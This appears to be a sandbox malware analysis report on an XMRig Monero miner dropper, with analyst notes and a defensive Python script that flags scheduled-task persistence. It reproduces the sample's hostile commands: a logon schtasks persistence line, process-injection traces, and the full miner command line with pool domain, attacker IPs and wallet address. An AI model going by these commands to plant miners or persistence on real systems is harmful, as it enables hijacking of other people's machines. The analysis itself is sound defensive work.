              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: 00000012.00000000.706240409.0000000140000000.00000040.00000001.sdmp, type: MEMORY; Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR; Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5252, type: MEMORYSTR; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR; Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: conhost.exe PID: 5952, type: MEMORYSTR; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR; Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6784, type: MEMORYSTR; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR; Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
              Source: Process Memory Space: explorer.exe PID: 6764, type: MEMORYSTR; Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EFFE106
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EFFE4D6
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EFFE90E
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EFFD4D2
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EFFED6A
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_00007FFA36125E22
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_00007FFA36125076
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E2FE4D6
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E2FE106
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E2FE90E
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E2FD4D2
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E2FED6A
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA36149B74
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA361467BC
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA36145E22
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA36145076
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA36144B79
              Source: C:\Windows\System32\conhost.exe; Code function: 15_2_000002A7810FE4D6
              Source: C:\Windows\System32\conhost.exe; Code function: 15_2_000002A7810FE106
              Source: C:\Windows\System32\conhost.exe; Code function: 15_2_000002A7810FE90E
              Source: C:\Windows\System32\conhost.exe; Code function: 15_2_000002A7810FD4D2
              Source: C:\Windows\System32\conhost.exe; Code function: 15_2_000002A7810FED6A
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00401D58 NtAllocateVirtualMemory
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00401D18 NtWriteVirtualMemory
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_004019D8 NtCreateThreadEx
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00401D98 NtProtectVirtualMemory
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00401C98 NtClose
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_00007FFA3614A30E NtUnmapViewOfSection
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_00401D58 NtAllocateVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_00401D18 NtWriteVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_004019D8 NtCreateThreadEx
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_00401D98 NtProtectVirtualMemory
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_00401C98 NtClose
              Source: C:\Windows\System32\conhost.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
              Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
              Source: pcNCraWcRk.exe; Virustotal: Detection: 64%
              Source: pcNCraWcRk.exe; Metadefender: Detection: 31%
              Source: pcNCraWcRk.exe; ReversingLabs: Detection: 81%
              Source: pcNCraWcRk.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown; Process created: C:\Users\user\Desktop\pcNCraWcRk.exe 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: unknown; Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\Desktop\pcNCraWcRk.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\System32\cmd.exe 'cmd' /c schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\System32\cmd.exe 'cmd' cmd /c 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Local\Temp\services64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe 'C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\cmd.exe; Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
              Source: C:\Users\user\AppData\Local\Temp\services64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' 'C:\Users\user\AppData\Local\Temp\services64.exe'
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Process created: C:\Windows\System32\conhost.exe 'C:\Windows\System32\conhost.exe' '/sihost64'
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo='rx/0' --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.givemexyz.in:8080 -o 194.5.249.24:8080 -o 212.114.52.24:8080 -o 198.23.214.117:8080 --user=46E9UkTFqALXNh2mSbA7WGDoa2i6h4WVgUgPVdT9ZdtweLRvAhWmbvuY1dhEmfjHbsavKXo3eGf5ZRb4qJzFXLVHGYH4moQ --pass=x --cpu-max-threads-hint=100 --cinit-idle-wait=5 --cinit-idle-cpu=100
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
              Source: C:\Windows\System32\conhost.exe; File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
              Source: C:\Windows\System32\conhost.exe; File created: C:\Users\user\AppData\Local\Temp\services64.exe
              Source: WR64.sys.9.dr; Binary string: \Device\WinRing0_1_2_0
              Source: classification engine; Classification label: mal100.evad.mine.winEXE@26/6@2/1
              Source: C:\Windows\System32\conhost.exe; File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\conhost.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe; Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
              Source: pcNCraWcRk; Joe Sandbox Cloud Basic: Detection: clean Score: 0
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_01
              Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_01
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe
              Source: C:\Windows\System32\conhost.exe; Process created: C:\Windows\explorer.exe
              Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\conhost.exe; File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: pcNCraWcRk.exe; Static file information: File size 2234368 > 1048576
              Source: pcNCraWcRk.exe; Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00
              Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: conhost.exe, 00000009.00000002.847420069.000002C9505A6000.00000004.00000001.sdmp, conhost.exe, 0000000F.00000000.688676721.000002A7830D1000.00000004.00000001.sdmp, WR64.sys.9.dr
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00623B00 push rax; retf 0_2_00623B01
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00623BFF push rax; iretd 0_2_00623C01
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_006238C0 push rax; retn 0009h 0_2_006238C1
              Source: C:\Users\user\Desktop\pcNCraWcRk.exe; Code function: 0_2_00623AB7 push rax; retf 0009h 0_2_00623AC1
              Source: C:\Windows\System32\conhost.exe; Code function: 1_2_0000025F5EDE0000 push es; iretd 1_2_0000025F5EDE0098
              Source: C:\Windows\System32\conhost.exe; Code function: 9_2_000002C94E0E0000 push es; iretd 9_2_000002C94E0E0098
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe; Code function: 13_2_00409B00 push rax; retf 13_2_00409B01
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_004098C0 push rax; retn 0009h13_2_004098C1
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409BFF push rax; iretd 13_2_00409C01
              Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeCode function: 13_2_00409AB7 push rax; retf 0009h13_2_00409AC1
              Source: C:\Windows\System32\conhost.exeCode function: 15_2_000002A780EE0000 push es; iretd 15_2_000002A780EE0098

Persistence and Installation Behavior:

Sample is not signed and drops a device driver
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe
Note: WR64.sys is the WinRing0 kernel driver (device name \Device\WinRing0_1_2_0 and the WinRing0.pdb path are listed above). XMRig bundles this driver to program CPU MSRs for RandomX; in this run it was written to disk but never loaded (see "Dropped PE file which has not been started" below), so the MSR tuning and any driver-level footprint did not occur. The dropped file names services64.exe and sihost64.exe borrow from the Windows binaries services.exe and sihost.exe but live under the user profile, where the real ones never do.

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn 'services64' /tr 'C:\Users\user\AppData\Local\Temp\services64.exe'
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
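
The scheduled-task entry above carries the whole persistence story in one command line: a logon trigger, the highest run level, a task name that imitates a Windows binary, and an action under %TEMP%. The following Python is an added triage example, not part of the Joe Sandbox report or of the sample: it parses that command line, rates it, and applies the same rating to constructed rows in the column layout of `schtasks /query /fo CSV /v` (only the TaskName, Task To Run, Run As User and Schedule Type columns are used, and the rows are made up for the example). The user-writable path pattern and the list of imitated system-binary names are heuristics chosen here, not something the report states.

```python
"""Added example, not part of the Joe Sandbox report: rate a `schtasks /create` command line
(and constructed `schtasks /query /fo CSV /v` rows) against the boot-survival pattern above:
logon trigger, highest run level, action under a user-writable profile path, and a task/file
name that imitates a Windows system binary."""
import csv
import io
import re

# Command line exactly as recorded in the report (the sandbox renders " as ').
REPORT_CMDLINE = ("schtasks /create /f /sc onlogon /rl highest /tn 'services64' "
                  "/tr 'C:\\Users\\user\\AppData\\Local\\Temp\\services64.exe'")

# Profile locations any user can write to without elevation (heuristic).
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Local\\Temp|Roaming)\\", re.I)
# Stems of Windows binaries whose names get borrowed (services64.exe, sihost64.exe in this
# report); heuristic list, extend as needed.
SYSTEM_STEMS = {"services", "sihost", "svchost", "csrss", "lsass", "winlogon", "conhost", "explorer"}
_TOKEN = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')


def tokenize(cmdline):
    """Split on whitespace, honouring single- or double-quoted arguments (no backslash escapes)."""
    return [a or b or c for a, b, c in _TOKEN.findall(cmdline)]


def parse_schtasks_create(cmdline):
    """Return ({option: value}, [bare switches]) for a schtasks /create invocation."""
    tokens = tokenize(cmdline)
    opts, switches = {}, []
    i = 0
    while i < len(tokens):
        tok = tokens[i].lower()
        # /sc onlogon, /rl highest, /tn name, /tr path, /ru user ... each take one value
        if tok.startswith("/") and i + 1 < len(tokens) and not tokens[i + 1].startswith("/"):
            opts[tok[1:]] = tokens[i + 1]
            i += 2
        else:
            switches.append(tok)   # schtasks, /create, /f
            i += 1
    return opts, switches


def assess_task(opts, switches):
    """Return the reasons a task looks like malware persistence (empty list: nothing notable)."""
    reasons = []
    target = opts.get("tr", "")
    if opts.get("sc", "").lower() == "onlogon":
        reasons.append("runs at every logon")
    if opts.get("rl", "").lower() == "highest":
        reasons.append("requests the highest run level (elevated token if the user is an administrator)")
    if USER_WRITABLE.search(target):
        reasons.append("action lives in a user-writable profile directory")
    stem = re.sub(r"\d+$", "", target.rsplit("\\", 1)[-1].rsplit(".", 1)[0]).lower()
    if stem in SYSTEM_STEMS:
        reasons.append(f"file name imitates the Windows binary {stem}.exe")
    if "/f" in switches:
        reasons.append("/f silently replaces an existing task of the same name")
    return reasons


# Constructed rows in the column layout of `schtasks /query /fo CSV /v` (subset of columns).
CONSTRUCTED_QUERY_CSV = '''"TaskName","Task To Run","Run As User","Schedule Type"
"\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c -h -o -$","SYSTEM","Multiple schedule types"
"\\services64","C:\\Users\\user\\AppData\\Local\\Temp\\services64.exe","user","At logon time"
'''


def hunt_query_csv(csv_text):
    """Flag /query rows matching at least two traits (run level is not a /query column)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        opts = {"tr": row["Task To Run"],
                "sc": "onlogon" if row["Schedule Type"].lower().startswith("at logon") else ""}
        reasons = assess_task(opts, [])
        if len(reasons) >= 2:
            hits.append((row["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    opts, switches = parse_schtasks_create(REPORT_CMDLINE)
    for reason in assess_task(opts, switches):
        print("-", reason)
    for name, reasons in hunt_query_csv(CONSTRUCTED_QUERY_CSV):
        print(name, "->", "; ".join(reasons))
```

On a live host the same rating can be fed from `schtasks /query /fo CSV /v` or from the XML under C:\Windows\System32\Tasks; note that `/rl highest` only yields an elevated token when the logged-on user is a member of Administrators, otherwise the task simply runs with the user's normal token at each logon.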

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\explorer.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 35000
Note: 922337203685477 ms is Int64.MaxValue in the 100-nanosecond units NtDelayExecution takes, converted to milliseconds; it denotes an indefinite wait, not a tuned sleep chosen to outlast a sandbox. The 35000 ms delay is the only bounded wait recorded. The conhost.exe processes are CLR hosts (see the CLR_v4.0\UsageLogs\conhost.exe.log file and the mscorlib.ni.dll loads above), so the injected payload is managed code.
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: conhost.exe, 00000009.00000003.689244321.000002C968A1D000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Note: the VMware device and volume names above were found in conhost.exe process memory. On their own they show that device or volume names were enumerated on a VMware guest, not that the sample compared them against a virtualization blocklist; the FirmwareTableInformation query by explorer.exe is the stronger VM-detection indicator in this section.

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.23.214.117 144
Source: C:\Windows\explorer.exe Domain query: xmr.givemexyz.in
Writes to foreign memory regions
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory written: C:\Windows\System32\conhost.exe base: 25F5EDE0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2C94E0E0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 886010
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 2A780EE0000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 16CC3390000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: DB8010
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\pcNCraWcRk.exe Memory allocated: C:\Windows\System32\conhost.exe base: 25F5EDE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2C94E0E0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 2A780EE0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 16CC3390000 protect: page execute and read and write
Injects a PE file into a foreign process
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140001000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140367000 value: 1E
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 1404A0000 value: F0
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140753000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140775000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140776000 value: C5
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140777000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 140779000 value: 48
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077B000 value: 60
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077C000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 14077D000 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6764 base: 886010 value: 00
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140000000 value: 4D
Source: C:\Windows\System32\conhost.exe Memory written: PID: 6784 base: 140001000 value: 48
